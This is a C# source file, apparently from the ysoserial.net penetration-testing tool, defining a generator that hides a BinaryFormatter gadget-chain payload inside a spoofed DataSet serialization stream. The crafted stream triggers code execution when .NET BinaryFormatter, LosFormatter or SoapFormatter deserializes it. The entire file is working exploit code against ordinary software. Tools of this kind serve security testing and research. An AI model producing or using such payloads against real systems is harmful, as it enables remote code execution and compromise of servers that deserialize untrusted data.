/
DataSetTypeSpoofGenerator.cs
102 lines (91 loc) · 3.63 KB
/
DataSetTypeSpoofGenerator.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
public class DataSetTypeSpoofGenerator : DataSetGenerator
{
public override string Name()
{
return "DataSetTypeSpoof";
}
public override string Contributors()
{
return "Soroush Dalili, Markus Wulftange, Jang";
}
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] init_payload =
(byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
{
return Serialize(payloadDataSetMarshal, formatter, inputArgs);
}
else
{
throw new Exception("Formatter not supported");
}
}
}
// https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
[Serializable]
public class DataSetSpoofMarshal : ISerializable
{
byte[] _fakeTable;
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
// info.SetType(typeof(System.Data.DataSet));
info.AssemblyName = "mscorlib";
info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
info.AddValue("DataSet.DataSetName", "");
info.AddValue("DataSet.Namespace", "");
info.AddValue("DataSet.Prefix", "");
info.AddValue("DataSet.CaseSensitive", false);
info.AddValue("DataSet.LocaleLCID", 0x409);
info.AddValue("DataSet.EnforceConstraints", false);
info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
info.AddValue("DataSet.Tables.Count", 1);
info.AddValue("DataSet.Tables_0", _fakeTable);
}
public void SetFakeTable(byte[] bfPayload)
{
_fakeTable = bfPayload;
}
public DataSetSpoofMarshal(byte[] bfPayload)
{
SetFakeTable(bfPayload);
}
public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
{
// This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
}
public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
{
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stm, fakeTable);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.Serialize(stm, fakeTable);
}
SetFakeTable(stm.ToArray());
}
public DataSetSpoofMarshal(MemoryStream ms)
{
SetFakeTable(ms.ToArray());
}
}
}